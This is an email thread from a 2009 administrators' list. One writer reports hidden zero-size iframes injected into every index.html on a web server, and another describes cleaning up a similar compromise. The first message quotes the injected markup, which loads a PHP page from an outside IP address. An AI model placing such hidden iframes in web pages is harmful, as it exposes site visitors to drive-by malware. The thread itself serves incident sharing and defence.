On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <berg@wins.net> wrote:
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html>
IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.
Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.
Just a heads up for folks; we have a team investigating...
Russell Berg Dir - Product Development Airstream Communications berg@wins.net 715-832-3726
I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company. We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company. But if you figure out how they got write access to a static website, I'd love to hear it. -N.